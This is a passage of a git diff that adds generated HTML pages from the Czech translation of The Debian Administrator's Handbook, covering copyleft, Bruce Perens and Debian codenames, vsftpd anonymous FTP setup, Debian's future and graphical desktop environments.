+						Copyleft je princip, který spočívá v používání autorských práv k zaručení svobody díla a děl z něho odvozených, spíše než k omezení práv na užívání, jako je tomu u proprietárního softwaru. Je to také hra se slovy z pojmu “Copyright”. Richard Stallman přišel na tuto myšlenku, když mu jeho přítel, co má rád slovní hříčky, napsal na jemu adresovanou obálku: “copyleft: všechna práva obrácena”. Copyleft ukládá zachování všech počátečních svobod po distribuci původní nebo modifikované verze díla (obvykle programu). Není tedy možné distribuovat program jako proprietární software, pokud je odvozen z kódu programu, který byl vydán pod copyleftem.
+					</div><div
+                    class="para">
+						Nejznámější skupinou copyleftových licencí je samozřejmě GNU GPL a její deriváty, GNU LGPL nebo Nižší všeobecná veřejná licence a GNU FDL nebo GNU Svobodná licence pro dokumentaci. Je smutné, že copyleftové licence jsou obyčejně vzájemně neslučitelné. V důsledku toho je nejlepší použít pouze jednu z nich.
+					</div></div></li></ol></div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.bruce-perens"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KOMUNITA</em></span> Bruce Perens, kontroverzní vůdce</strong></p></div></div></div><a
+              id="id-1.4.5.6.10.2"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.3"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.4"
+              class="indexterm"></a><div
+              class="para">
+				Bruce Perens byl druhým vedoucím projektu Debian, těsně po Ianu Murdockovi. Byl velmi kontroverzní ve svých dynamických a autoritářských metodách. Přesto zůstává důležitým přispěvatelem Debianu, jemuž je Debian obzvláště zavázán pro sestavení věhlasných “Směrnic Debianu pro svobodný software” (DFSG), původní myšlenky Eana Schuesslera. Následně, Bruce z nich odvodil slavnou “Definici pro Open Source”, kdy z nich odstranil všech odkazy na Debian. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.opensource.org/">http://www.opensource.org/</a></div>
+			</div><div
+              class="para">
+				Jeho odchod z projektu byl dost emotivní, ale Bruce zůstal silně připojený k Debianu, protože stále pokračuje v propagaci této distribuce v politických a ekonomických sférách. Stále se sporadicky objevuje na e-mailových konferencích, aby přispěl svou radou a představil své nejnovější iniciativy ve prospěch Debianu.
+			</div><a
+              id="id-1.4.5.6.10.7"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.8"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.9"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.10"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.11"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.12"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.13"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.14"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.15"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.16"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.17"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.18"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.19"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.20"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.21"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.22"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.23"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.24"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.25"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.26"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.27"
+              class="indexterm"></a><div
+              class="para">
+				Last anecdotal point, it was Bruce who was responsible for inspiring the different “codenames” for Debian versions (1.1 — <span
+                class="distribution distribution">Rex</span>, 1.2 — <span
+                class="distribution distribution">Buzz</span>, 1.3 — <span
+                class="distribution distribution">Bo</span>, 2.0 — <span
+                class="distribution distribution">Hamm</span>, 2.1 — <span
+                class="distribution distribution">Slink</span>, 2.2 — <span
+                class="distribution distribution">Potato</span>, 3.0 — <span
+                class="distribution distribution">Woody</span>, 3.1 — <span
+                class="distribution distribution">Sarge</span>, 4.0 — <span
+                class="distribution distribution">Etch</span>, 5.0 — <span
+                class="distribution distribution">Lenny</span>, 6.0 — <span
+                class="distribution distribution">Squeeze</span>, 7 — <span
+                class="distribution distribution">Wheezy</span>, 8 — <span
+                class="distribution distribution">Jessie</span>, 9 — <span
+                class="distribution distribution">Stretch</span>, 10 (not released yet) — <span
+                class="distribution distribution">Buster</span>, 11 (not released yet) — <span
+                class="distribution distribution">Bullseye</span>, <span
+                class="distribution distribution">Unstable</span> — <span
+                class="distribution distribution">Sid</span>). They are taken from the names of characters in the Toy Story movie. This animated film entirely composed of computer graphics was produced by Pixar Studios, with whom Bruce was employed at the time that he led the Debian project. The name “Sid” holds particular status, since it will eternally be associated with the <span
+                class="distribution distribution">Unstable</span> branch. In the film, this character was the neighbor child, who was always breaking toys — so beware of getting too close to <span
+                class="distribution distribution">Unstable</span>. Otherwise, <span
+                class="distribution distribution">Sid</span> is also an acronym for “Still In Development”.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="the-debian-project.html"><strong>Předcházející</strong>Kapitola 1. Projekt Debian</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.debian-internals.html"><strong>Další</strong>1.3. Vnitřní fungování projektu Debian</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.ftp-file-server.html b/tmp/cs-CZ/html/sect.ftp-file-server.html
new file mode 100644
index 000000000..766c48e2f
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.ftp-file-server.html
@@ -0,0 +1,108 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.3. FTP File Server</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.http-web-server.html"
+        title="11.2. Web Server (HTTP)" /><link
+        rel="next"
+        href="sect.nfs-file-server.html"
+        title="11.4. NFS File Server" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.ftp-file-server.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.http-web-server.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.nfs-file-server.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.ftp-file-server"></a>11.3. FTP File Server</h2></div></div></div><a
+          id="id-1.14.6.2"
+          class="indexterm"></a><div
+          class="para">
+			FTP (<span
+            class="emphasis"><em>File Transfer Protocol</em></span>) is one of the first protocols of the Internet (RFC 959 was issued in 1985!). It was used to distribute files before the Web was even born (the HTTP protocol was created in 1990, and formally defined in its 1.0 version by RFC 1945, issued in 1996).
+		</div><div
+          class="para">
+			This protocol allows both file uploads and file downloads; for this reason, it is still widely used to deploy updates to a website hosted by one's Internet service provider (or any other entity hosting websites). In these cases, secure access is enforced with a user identifier and password; on successful authentication, the FTP server grants read-write access to that user's home directory.
+		</div><div
+          class="para">
+			Other FTP servers are mainly used to distribute files for public downloading; Debian packages are a good example. The contents of these servers is fetched from other, geographically remote, servers; it is then made available to less distant users. This means that client authentication is not required; as a consequence, this operating mode is known as “anonymous FTP”. To be perfectly correct, the clients do authenticate with the <code
+            class="literal">anonymous</code> username; the password is often, by convention, the user's email address, but the server ignores it.
+		</div><div
+          class="para">
+			Many FTP servers are available in Debian (<span
+            class="pkg pkg">ftpd</span>, <span
+            class="pkg pkg">proftpd-basic</span>, <span
+            class="pkg pkg">pyftpd</span> and so on). The Falcot Corp administrators picked <span
+            class="pkg pkg">vsftpd</span> because they only use the FTP server to distribute a few files (including a Debian package repository); since they don't need advanced features, they chose to focus on the security aspects.
+		</div><a
+          id="id-1.14.6.7"
+          class="indexterm"></a><div
+          class="para">
+			Installing the package creates an <code
+            class="literal">ftp</code> system user. This account is always used for anonymous FTP connections, and its home directory (<code
+            class="filename">/srv/ftp/</code>) is the root of the tree made available to users connecting to this service. The default configuration (in <code
+            class="filename">/etc/vsftpd.conf</code>) requires some changes to cater to the simple need of making big files available for public downloads: anonymous access needs to be enabled (<code
+            class="literal">anonymous_enable=YES</code>) and read-only access of local users needs to be disabled (<code
+            class="literal">local_enable=NO</code>). The latter is particularly important since the FTP protocol doesn't use any form of encryption and the user password could be intercepted over the wire.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.http-web-server.html"><strong>Předcházející</strong>11.2. Web Server (HTTP)</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.nfs-file-server.html"><strong>Další</strong>11.4. NFS File Server</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.future-of-debian.html b/tmp/cs-CZ/html/sect.future-of-debian.html
new file mode 100644
index 000000000..d56d170b1
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.future-of-debian.html
@@ -0,0 +1,98 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">16.2. Debian's Future</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Future, Improvements, Opinions" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="conclusion.html"
+        title="Kapitola 16. Conclusion: Debian's Future" /><link
+        rel="prev"
+        href="conclusion.html"
+        title="Kapitola 16. Conclusion: Debian's Future" /><link
+        rel="next"
+        href="sect.future-of-this-book.html"
+        title="16.3. Future of this Book" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.future-of-debian.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="conclusion.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.future-of-this-book.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.future-of-debian"></a>16.2. Debian's Future</h2></div></div></div><div
+          class="para">
+			In addition to these internal developments, one can reasonably expect new Debian-based distributions to come to light, as many tools keep making this task easier. New specialized subprojects will also be started, in order to widen Debian's reach to new horizons.
+		</div><div
+          class="para">
+			The Debian user community will increase, and new contributors will join the project… including, maybe, you!
+		</div><div
+          class="para">
+			The Debian project is stronger than ever, and well on its way towards its goal of a universal distribution; the inside joke within the Debian community is about <span
+            class="foreignphrase"><em
+              class="foreignphrase">World Domination</em></span>.
+		</div><div
+          class="para">
+			In spite of its old age and its respectable size, Debian keeps on growing in all kinds of (sometimes unexpected) directions. Contributors are teeming with ideas, and discussions on development mailing lists, even when they look like bickerings, keep increasing the momentum. Debian is sometimes compared to a black hole, of such density that any new free software project is attracted.
+		</div><div
+          class="para">
+			Beyond the apparent satisfaction of most Debian users, a deep trend is becoming more and more indisputable: people are increasingly realising that collaborating, rather than working alone in their corner, leads to better results for everyone. Such is the rationale used by distributions merging into Debian by way of subprojects.
+		</div><div
+          class="para">
+			The Debian project is therefore not threatened by extinction…
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="conclusion.html"><strong>Předcházející</strong>Kapitola 16. Conclusion: Debian's Future</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.future-of-this-book.html"><strong>Další</strong>16.3. Future of this Book</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.future-of-this-book.html b/tmp/cs-CZ/html/sect.future-of-this-book.html
new file mode 100644
index 000000000..ecd6943a0
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.future-of-this-book.html
@@ -0,0 +1,109 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">16.3. Future of this Book</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Future, Improvements, Opinions" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="conclusion.html"
+        title="Kapitola 16. Conclusion: Debian's Future" /><link
+        rel="prev"
+        href="sect.future-of-debian.html"
+        title="16.2. Debian's Future" /><link
+        rel="next"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.future-of-this-book.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.future-of-debian.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="derivative-distributions.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.future-of-this-book"></a>16.3. Future of this Book</h2></div></div></div><div
+          class="para">
+			We would like this book to evolve in the spirit of free software. We therefore welcome contributions, remarks, suggestions, and criticism. Please direct them to Raphaël (<code
+            class="email"><a
+              class="email"
+              href="mailto:hertzog@debian.org">hertzog@debian.org</a></code>) or Roland (<code
+            class="email"><a
+              class="email"
+              href="mailto:lolando@debian.org">lolando@debian.org</a></code>). For actionable feedback, feel free to open bug reports against the <code
+            class="literal">debian-handbook</code> Debian package. The website will be used to gather all information relevant to its evolution, and you will find there information on how to contribute, in particular if you want to translate this book to make it available to an even larger public than today. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://debian-handbook.info/">http://debian-handbook.info/</a></div>
+		</div><div
+          class="para">
+			We tried to integrate most of what our experience at Debian taught us, so that anyone can use this distribution and take the best advantage of it as soon as possible. We hope this book contributes to making Debian less confusing and more popular, and we welcome publicity around it!
+		</div><div
+          class="para">
+			We would like to conclude on a personal note. Writing (and translating) this book took a considerable amount of time out of our usual professional activity. Since we are both freelance consultants, any new source of income grants us the freedom to spend more time improving Debian; we hope this book to be successful and to contribute to this. In the meantime, feel free to retain our services! <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.freexian.com">http://www.freexian.com</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.gnurandal.com">http://www.gnurandal.com</a></div>
+		</div><div
+          class="para">
+			See you soon!
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.future-of-debian.html"><strong>Předcházející</strong>16.2. Debian's Future</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="derivative-distributions.html"><strong>Další</strong>Příloha A. Derivative Distributions</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.graphical-desktops.html b/tmp/cs-CZ/html/sect.graphical-desktops.html
new file mode 100644
index 000000000..8eb4a0984
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.graphical-desktops.html
@@ -0,0 +1,192 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.3. Graphical Desktops</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.customizing-graphical-interface.html"
+        title="13.2. Customizing the Graphical Interface" /><link
+        rel="next"
+        href="sect.main-desktop-tools.html"
+        title="13.4. Email" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.graphical-desktops.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.customizing-graphical-interface.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.main-desktop-tools.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.graphical-desktops"></a>13.3. Graphical Desktops</h2></div></div></div><div
+          class="para">
+			The free graphical desktop field is dominated by two large software collections: GNOME and Plasma by KDE. Both of them are very popular. This is rather a rare instance in the free software world; the Apache web server, for instance, has very few peers.
+		</div><a
+          id="id-1.16.6.3"
+          class="indexterm"></a><a
+          id="id-1.16.6.4"
+          class="indexterm"></a><a
+          id="id-1.16.6.5"
+          class="indexterm"></a><a
+          id="id-1.16.6.6"
+          class="indexterm"></a><a
+          id="id-1.16.6.7"
+          class="indexterm"></a><div
+          class="para">
+			This diversity is rooted in history. Plasma (initially only KDE, which is now the name of the community) was the first graphical desktop project, but it chose the Qt graphical toolkit and that choice wasn't acceptable for a large number of developers. Qt was not free software at the time, and GNOME was started based on the GTK+ toolkit. Qt has since become free software, but the projects still evolved in parallel.
+		</div><div
+          class="para">
+			The GNOME and KDE communities still work together: under the FreeDesktop.org umbrella, the projects collaborated in defining standards for interoperability across applications.
+		</div><a
+          id="id-1.16.6.10"
+          class="indexterm"></a><div
+          class="para">
+			Choosing “the best” graphical desktop is a sensitive topic which we prefer to steer clear of. We will merely describe the many possibilities and give a few pointers for further thoughts. The best choice will be the one you make after some experimentation.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.gnome-desktop"></a>13.3.1. GNOME</h3></div></div></div><div
+            class="para">
+				Debian <span
+              class="distribution distribution">Stretch</span> includes GNOME version 3.22, which can be installed by a simple <code
+              class="command">apt install gnome</code> (it can also be installed by selecting the “Debian desktop environment” task).
+			</div><a
+            id="id-1.16.6.12.3"
+            class="indexterm"></a><div
+            class="para">
+				GNOME is noteworthy for its efforts in usability and accessibility. Design professionals have been involved in writing its standards and recommendations, which has helped developers to create satisfying graphical user interfaces. The project also gets encouragement from the big players of computing, such as Intel, IBM, Oracle, Novell, and of course, various Linux distributions. Finally, many programming languages can be used in developing applications interfacing to GNOME.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.6.12.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/gnome.png"
+                  alt="The GNOME desktop" /></div></div><p
+              class="title"><strong>Obrázek 13.1. The GNOME desktop</strong></p></div><div
+            class="para">
+				For administrators, GNOME seems to be better prepared for massive deployments. Application configuration is handled through the GSettings interface and stores its data in the DConf database. The configuration settings can thus be queried and edited with the <code
+              class="command">gsettings</code>, and <code
+              class="command">dconf</code> command-line tools, or by the <code
+              class="command">dconf-editor</code> graphical user interfaces. The administrator can therefore change users' configuration with a simple script. The GNOME website provides information to guide administrators who manage GNOME workstations: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://help.gnome.org/admin/">https://help.gnome.org/admin/</a></div>
+			</div><a
+            id="id-1.16.6.12.7"
+            class="indexterm"></a><a
+            id="id-1.16.6.12.8"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.6.13"></a>13.3.2. KDE and Plasma</h3></div></div></div><div
+            class="para">
+				Debian <span
+              class="distribution distribution">Stretch</span> includes version 5.8 of KDE Plasma, which can be installed with <code
+              class="command">apt install kde-standard</code>.
+			</div><div
+            class="para">
+				Plasma has had a rapid evolution based on a very hands-on approach. Its authors quickly got very good results, which allowed them to grow a large user-base. These factors contributed to the overall project quality. Plasma is a mature desktop environment with a wide range of applications.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.6.13.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/kde.png"
+                  alt="The Plasma desktop" /></div></div><p
+              class="title"><strong>Obrázek 13.2. The Plasma desktop</strong></p></div><div
+            class="para">
+				Since the Qt 4.0 release, the last remaining license problem with KDE software has been solved. This version was released under the GPL both for Linux and Windows (the Windows version was previously released under a non-free license). KDE applications are primarily developed using the C++ language.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.6.14"></a>13.3.3. Xfce and Others</h3></div></div></div><div
+            class="para">
+				Xfce is a simple and lightweight graphical desktop, which is a perfect match for computers with limited resources. It can be installed with <code
+              class="command">apt install xfce4</code>. Like GNOME, Xfce is based on the GTK+ toolkit, and several components are common across both desktops.
+			</div><a
+            id="id-1.16.6.14.3"
+            class="indexterm"></a><div
+            class="para">
+				Unlike GNOME and Plasma, Xfce does not aim to become a vast project. Beyond the basic components of a modern desktop (file manager, window manager, session manager, a panel for application launchers and so on), it only provides a few specific applications: a terminal, a calendar (Orage), an image viewer, a CD/DVD burning tool, a media player (Parole), sound volume control and a text editor (mousepad).
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.6.14.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/xfce.png"
+                  alt="The Xfce desktop" /></div></div><p
+              class="title"><strong>Obrázek 13.3. The Xfce desktop</strong></p></div><div
+            class="para">
+				Another desktop environment provided in <span
+              class="distribution distribution">Stretch</span> is LXDE, which focuses on the “lightweight” aspect. It can be installed with the <span
+              class="pkg pkg">lxde</span> meta-package.
+			</div><a
+            id="id-1.16.6.14.7"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.customizing-graphical-interface.html"><strong>Předcházející</strong>13.2. Customizing the Graphical Interface</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.main-desktop-tools.html"><strong>Další</strong>13.4. Email</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.grml.html b/tmp/cs-CZ/html/sect.grml.html
new file mode 100644
index 000000000..056d2c897
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.grml.html
@@ -0,0 +1,89 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.6. Grml</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.aptosid.html"
+        title="A.5. Aptosid and Siduction" /><link
+        rel="next"
+        href="sect.tails.html"
+        title="A.7. Tails" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.grml.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.aptosid.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
